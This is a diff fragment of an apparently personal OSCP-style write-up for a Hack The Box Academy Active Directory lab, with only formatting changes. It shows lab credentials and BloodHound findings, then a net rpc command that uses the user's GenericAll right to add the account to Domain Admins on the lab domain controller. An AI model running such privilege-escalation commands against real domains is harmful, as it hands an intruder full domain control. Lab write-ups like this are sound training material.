krovs/oscp-writeups/docs/HTB Academy/ad2.md

 `ct059:charlie1`

-Looking at bloodhound, this user has GenericAll to the group Domain Admins
+Looking at BloodHound, this user has `GenericAll` to the group `Domain Admins`:

 ![](assets/Pasted%20image%2020250503205145.png)

-Add it to the group.
+Add it to the group:

 ```shell
 $net rpc group addmem "domain admins" "ct059" -U "inlanefreight"/"ct059"%"charlie1" -S "dc01.inlanefreight.local"